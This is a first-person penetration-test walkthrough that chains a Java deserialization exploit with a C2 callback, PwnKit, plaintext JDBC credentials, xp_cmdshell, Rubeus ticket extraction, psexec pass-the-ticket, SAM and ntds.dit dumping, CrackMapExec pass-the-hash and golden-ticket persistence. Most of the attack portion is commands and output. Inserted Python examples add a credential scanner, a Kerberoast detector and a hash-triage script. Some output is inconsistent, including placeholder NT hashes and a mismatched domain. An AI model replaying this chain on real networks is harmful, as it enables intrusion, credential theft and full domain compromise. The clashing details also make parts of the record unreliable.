Well, I recently worked on a project where I exploited a Java deserialization flaw,
then used credentials found in the application's JDBC configuration to log in to MSSQL
and chained a set of steps to get Domain Admin access.
Getting in:
kys : ~ % ./auto-ysoserial -r <c2-ip>:53 -o mythic.data
kys : ~ % ./poc -t <target> -c mythic.data
After getting in and escalating to root with PwnKit (CVE-2021-4034, the polkit pkexec
local privilege escalation), I already knew from the application that I would find a
JDBC connection string somewhere in the application files:
String dbURL = "jdbc:sqlserver://portal.target.inc\\webportal;user=mssql;password=G0sh#!01";
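Hunting for strings like the one above by hand gets old fast, so here is a small scanner for JDBC URLs that embed credentials. This is an added example, not code from the original post: it parses the SQL Server form (jdbc:sqlserver://host[\instance][:port];key=value;...) that the page's dbURL uses, plus the user:password@host form that MySQL/PostgreSQL-style drivers accept, and redacts the password in the report. The SAMPLE text is constructed from the page's connection string and two other common forms.

```python
# Added example (not from the original post): find JDBC connection strings that
# embed credentials in application files, the way the dbURL above was found.
# Handles the SQL Server form jdbc:sqlserver://host[\instance][:port];k=v;...
# and the user:password@host form used by MySQL/PostgreSQL-style drivers.
# Stdlib only; the SAMPLE text is constructed.
import re

# host stops at '\' (named instance), ':' (port), ';' (properties) or a quote.
_SQLSERVER = re.compile(
    r'jdbc:sqlserver://(?P<host>[^\\:;"\s]+)'
    r'(?:\\{1,2}(?P<instance>[^:;"\s]+))?'   # "\\" in Java source is one backslash
    r'(?::(?P<port>\d+))?'
    r'(?P<props>(?:;[^;"\s]+=[^;"\s]*)*)'      # ;user=...;password=...
)
_USERINFO = re.compile(
    r'jdbc:(?P<driver>(?!sqlserver)[a-z0-9]+)://'
    r'(?P<user>[^:/@"\s]+):(?P<password>[^@"\s]+)@(?P<host>[^:/"\s]+)'
)


def find_jdbc_credentials(text):
    """Return one dict per JDBC URL found; password is None when not embedded."""
    hits = []
    for m in _SQLSERVER.finditer(text):
        props = {}
        for kv in m.group("props").split(";"):
            if "=" in kv:
                key, value = kv.split("=", 1)
                props[key.lower()] = value
        hits.append({
            "driver": "sqlserver",
            "host": m.group("host"),
            "instance": m.group("instance"),
            "port": int(m.group("port")) if m.group("port") else None,
            "user": props.get("user") or props.get("username"),
            "password": props.get("password"),
            # integratedSecurity=true: the service account's Windows identity is used, no password in the file
            "integrated": props.get("integratedsecurity", "").lower() == "true",
        })
    for m in _USERINFO.finditer(text):
        hits.append({
            "driver": m.group("driver"),
            "host": m.group("host"),
            "instance": None,
            "port": None,
            "user": m.group("user"),
            "password": m.group("password"),
            "integrated": False,
        })
    return hits


def redact(secret):
    """Keep the first character so a finding can be matched to the file without reprinting the secret."""
    if not secret:
        return None
    return secret[0] + "*" * (len(secret) - 1)


def report(text):
    lines = []
    for h in find_jdbc_credentials(text):
        target = h["host"]
        if h["instance"]:
            target += "\\" + h["instance"]
        if h["port"]:
            target += ":%d" % h["port"]
        if h["password"]:
            lines.append("EMBEDDED CREDS  %s://%s  user=%s password=%s"
                         % (h["driver"], target, h["user"], redact(h["password"])))
        elif h["integrated"]:
            lines.append("integrated auth %s://%s (no password in file)" % (h["driver"], target))
        else:
            lines.append("no password     %s://%s" % (h["driver"], target))
    return lines


# Constructed sample: the page's connection string plus two other common forms.
SAMPLE = r'''
String dbURL = "jdbc:sqlserver://portal.target.inc\\webportal;user=mssql;password=G0sh#!01";
spring.datasource.url=jdbc:sqlserver://db01.target.inc:1433;databaseName=portal;integratedSecurity=true
reports.url=jdbc:mysql://reports:Summ3r!@reports.target.inc:3306/reports
'''

if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
```

Run it over a `grep -r "jdbc:" .` of the application directory rather than single files; the integratedSecurity case is worth keeping in the output because it tells you the database trusts the service account itself, which is the next thing to go after.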
Once you've found the MSSQL credentials, there are two important things to note.
First, the mssql account has an SPN (Service Principal Name) registered, which marks it
as a service account. Any authenticated domain user can request a Kerberos service ticket
for that SPN, and that ticket is encrypted with a key derived from the account's password,
so accounts with SPNs are Kerberoastable: the ticket can be taken offline and cracked.
Second, MSSQL is one of the easiest places to turn database access into OS command
execution: the xp_cmdshell extended stored procedure runs commands as the SQL Server
service account, and a sysadmin login can switch it on with sp_configure even though
it is disabled by default.
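The Kerberoast point above has a defender's side worth knowing about, because it is exactly what a blue team will be looking for while you are doing it. The example below is added here and is not from the original post: it runs a simple Kerberoast heuristic over Windows Security event 4769 (service ticket requested) records. One requester asking for tickets for several different SPN accounts inside a short window, with the RC4 encryption type (0x17) that crackers prefer, is the classic signature; krbtgt and machine accounts ($) are excluded as normal noise. The EVENTS list is constructed; its field names mirror 4769's TargetUserName, IpAddress, ServiceName, TicketEncryptionType and Status.

```python
# Added example (not from the original post): spot Kerberoasting in Windows
# Security event 4769 (Kerberos service ticket requested). Kerberoasting looks
# like one requester asking for service tickets for many different SPN-bearing
# accounts in a short window, usually with RC4 (etype 0x17) because RC4 tickets
# crack fastest. Machine accounts ($) and krbtgt are excluded as normal noise.
# Stdlib only; EVENTS below are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP


def ev(time, account, ip, service, etype, status="0x0"):
    return {"time": "2023-01-10T" + time, "account": account, "ip": ip,
            "service": service, "etype": etype, "status": status}


EVENTS = [
    ev("09:00:01", "low-user@TARGET.INC", "10.0.0.25", "mssql", "0x17"),
    ev("09:00:02", "low-user@TARGET.INC", "10.0.0.25", "http-portal", "0x17"),
    ev("09:00:02", "low-user@TARGET.INC", "10.0.0.25", "DC01$", "0x17"),   # machine account, ignored
    ev("09:00:03", "low-user@TARGET.INC", "10.0.0.25", "krbtgt", "0x12"),  # TGT traffic, ignored
    ev("09:00:04", "low-user@TARGET.INC", "10.0.0.25", "backup-svc", "0x17"),
    ev("09:00:05", "low-user@TARGET.INC", "10.0.0.25", "mssql", "0x17"),   # repeat, counted once
    ev("09:15:00", "high-user@TARGET.INC", "10.0.0.40", "mssql", "0x12"),  # AES, normal use
    ev("10:30:00", "high-user@TARGET.INC", "10.0.0.40", "http-portal", "0x12"),
    ev("12:00:00", "high-user@TARGET.INC", "10.0.0.40", "backup-svc", "0x12"),
]


def kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3):
    """One alert per (account, ip) whose successful RC4 service-ticket requests
    cover at least min_services distinct services inside some window-long span."""
    by_requester = defaultdict(list)
    for e in events:
        if e["status"] != "0x0" or e["etype"].lower() not in RC4_ETYPES:
            continue
        svc = e["service"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_requester[(e["account"], e["ip"])].append((datetime.fromisoformat(e["time"]), svc))

    alerts = []
    for (account, ip), reqs in by_requester.items():
        reqs.sort()
        best = None
        for i, (start, _) in enumerate(reqs):
            # distinct services requested from this event until the window closes
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services and (best is None or len(services) > len(best[1])):
                best = (start, services)
        if best:
            alerts.append({"account": account, "ip": ip,
                           "window_start": best[0].isoformat(),
                           "services": sorted(best[1])})
    return alerts


if __name__ == "__main__":
    for a in kerberoast_candidates(EVENTS):
        print("possible kerberoast: %s from %s at %s -> %s"
              % (a["account"], a["ip"], a["window_start"], ", ".join(a["services"])))
```

The RC4 filter is what makes this cheap; a domain that has already forced AES on its service accounts will not see 0x17 requests, so there you drop the etype filter and lean on the volume threshold alone. From the attacker's side the same logic tells you what not to do: request one ticket, not every SPN in the domain, and request it with AES if the account supports it.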
Personally, to get that command execution I like to use a small MSSQL shell script I
first saw in an IppSec video; it logs in, enables xp_cmdshell and wraps it in a pseudo-shell:
kys : ~ % grep MSSQL_ mssql_shell.py
MSSQL_SERVER="portal.target.inc"
MSSQL_USERNAME = "target.inc\\mssql"
MSSQL_PASSWORD = "G0sh#!01"
kys : ~ % ./mssql_shell.py
Successful login: mssql@portal.target.inc
Trying to enable xp_cmdshell ...
CMD mssql@target.inc C:\Windows\System32> whoami
nt service\mssql
After gaining command execution, I use the script's UPLOAD feature to drop Rubeus on
the box and use it to pull a Kerberos ticket out of the session. The command I run is
tgtdeleg, which abuses the Kerberos GSS-API delegation handshake to make the OS hand
over a usable TGT for the account the process runs as, with no admin rights and no
access to LSASS. Strictly speaking that is ticket extraction, not Kerberoasting
(Rubeus kerberoast would request service tickets for SPN accounts like mssql and
crack them offline); what follows is a pass-the-ticket.
CMD mssql@target.inc C:\Program Files> UPLOAD /kys/rubeus.exe
Uploading /kys/rubeus.exe to C:\Program Files
* * * UPLOAD PROCEDURE FINISHED * * *
CMD mssql@target.inc C:\Program Files> .\Rubeus.exe tgtdeleg
[output cut]
base64(ticket.kirbi): [...] F2Dsfl+nWDcbsCbvMrLpxs9pUI8/m+6gr+pTdCU [...]
Ticket in hand, time to pass it.
To pass the ticket from Linux, I use ticketConverter.py from the impacket toolkit to
convert the kirbi (the format Rubeus and Mimikatz use) into a ccache (the MIT Kerberos
format impacket reads), export it as KRB5CCNAME, and point impacket's psexec at it:
kys : /kys/impacket % base64 -d ticket.kirbi.b64 >ticket.kirbi
kys : /kys/impacket % ticketConverter.py ticket.kirbi ticket.ccache
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Converting kirbi to ccache...
[+] done
kys : /kys/impacket % export KRB5CCNAME=/kys/impacket/ticket.ccache; ./psexec.py -k -no-pass target.inc/Administrator@portal.target.inc
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on DC.....
[*] Found writable share ADMIN$
[*] Uploading file GfwUin5k.exe
[*] Opening SVCManager on DC.....
[*] Creating service pQws on DC.....
[*] Starting service pQws.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Once that's done, it's time to dump hashes without touching LSASS: create a volume
shadow copy, copy the SAM and SYSTEM hives out of it (on the live volume they are
locked), pull them back to the attacker box and extract the hashes offline with
secretsdump. Those hashes are what I'll use for lateral movement towards a domain
controller.
C:\Windows\system32>vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {0-0-0-0-0}
Shadow Copy Volume Name: \\?\NAME\
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SAM C:\temp\SAM
1 file(s) copied.
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SYSTEM C:\temp\SYSTEM
1 file(s) copied.
C:\Windows\system32> vssadmin delete shadows /shadow={0-0-0-0-0}
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? y
Successfully deleted 1 shadow copies.
mythic > download C:\temp\SAM
[*] downloading: C:\temp\SAM -> /kys/SAM
[*] downloaded: C:\temp\SAM -> /kys/SAM
mythic > download C:\temp\SYSTEM
[*] downloading: C:\temp\SYSTEM -> /kys/SYSTEM
[*] downloaded: C:\temp\SYSTEM -> /kys/SYSTEM
kys : /kys/impacket % secretsdump.py -system SYSTEM -sam SAM LOCAL
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
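Before spraying a dump like this around, it pays to triage it. The example below is added here and is not from the original post: it parses secretsdump-style `uid:rid:lmhash:nthash` lines and flags the things that matter for the next step, namely accounts that still store an LM hash (cracks in minutes), accounts whose NT hash is the empty password, NT hashes shared between accounts (password reuse, which is exactly why pass-the-hash pivots succeed) and the krbtgt entry. The SAMPLE dump is constructed; apart from the well-known empty-LM and empty-NT values, the hashes in it are made up.

```python
# Added example (not from the original post): triage a secretsdump-style hash
# dump (uid:rid:lmhash:nthash) before spraying it around. It flags accounts that
# still store an LM hash, accounts whose NT hash is the empty password, NT hashes
# shared by several accounts (password reuse: the pass-the-hash pivots that will
# succeed) and the krbtgt entry. Stdlib only; the SAMPLE dump is constructed and
# the non-empty NT hashes in it are made-up values.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32})(?:\:\:\:)?\s*$"
)

SAMPLE = r"""
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2f6b4d1c9e8a7b3c5d4e6f1a2b3c4d5e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-backup:1001:0182bd0bd4444bf836077a718ccdf409:2f6b4d1c9e8a7b3c5d4e6f1a2b3c4d5e:::
low-user:1005:aad3b435b51404eeaad3b435b51404ee:7a1f3c5e9b2d4f6a8c0e1b3d5f7a9c2e:::
target.inc\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c3e5a7b9d1f2e4a6c8b0d2f4a6c8e0b2:::
"""


def parse_secretsdump(text):
    """Keep only hash lines (trailing ::: optional); banner and status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries


def triage(entries):
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings.append({"accounts": [e["user"]], "issue": "lm_hash"})
        if e["nt"] == EMPTY_NT:
            findings.append({"accounts": [e["user"]], "issue": "empty_password"})
        if e["rid"] == 502 or e["user"].lower().endswith("krbtgt"):
            findings.append({"accounts": [e["user"]], "issue": "krbtgt"})
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append({"accounts": users, "issue": "shared_nt"})
    return findings


DESCRIPTIONS = {
    "lm_hash": "LM hash stored: 14-char max, case-insensitive DES, cracks in minutes",
    "empty_password": "NT hash of the empty password",
    "krbtgt": "krbtgt key: enough for golden tickets; reset it twice to invalidate them",
    "shared_nt": "identical NT hash: password reuse, pass-the-hash works between these accounts",
}

if __name__ == "__main__":
    for f in triage(parse_secretsdump(SAMPLE)):
        print("%-32s %s" % (", ".join(f["accounts"]), DESCRIPTIONS[f["issue"]]))
```

The shared-NT check is the one to run across every host you dump, not just within one: a local Administrator hash that repeats on several machines is the finding that turns one box into the whole fleet.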
For the lateral movement itself I like to use CrackMapExec to pass the hash over SMB, but
be careful: spraying an NT hash at hosts and running commands through the service manager
is noisy, and networks with IDS/IPS or an EDR will easily pick up activity like this.
kys : /kys/CrackMapExec % proxychains4 -f /opt/proxychains4.conf -q crackmapexec smb 1.1.1.1 -u Administrator -H aad3b435b51404eeaad3b435b51404ee --local-auth -x 'net group "domain admins" /domain'
SMB 1.1.1.1 445 VENOM [*] Windows Server 2003 3790 Service Pack 2 (name:VENOM) (domain:escrita-e.com.br) (signing:True) (SMBv1:True)
SMB 1.1.1.1 445 VENOM [+] target.inc\Administrator:aad3b435b51404eeaad3b435b51404ee (Pwn3d!)
SMB 1.1.1.1 445 VENOM [+] Executed command
SMB 1.1.1.1 445 VENOM Group Name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
exchange exchangeadmin domain_admin2
operator domain_admin1
On the domain controller I used the same shadow-copy technique, this time to copy out
ntds.dit (the AD database) together with its SYSTEM hive, and fed them to secretsdump,
which gave me the domain credentials, including the krbtgt hash.
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
With the krbtgt hash we can forge TGTs for any user in the domain (a golden ticket attack)
and keep access for as long as the krbtgt key stays the same, which in many environments
is years. The only real fix is to reset the krbtgt password twice, since the KDC keeps the
previous key and a single reset still leaves forged tickets valid.
Thanks for reading, I really hope you learned something.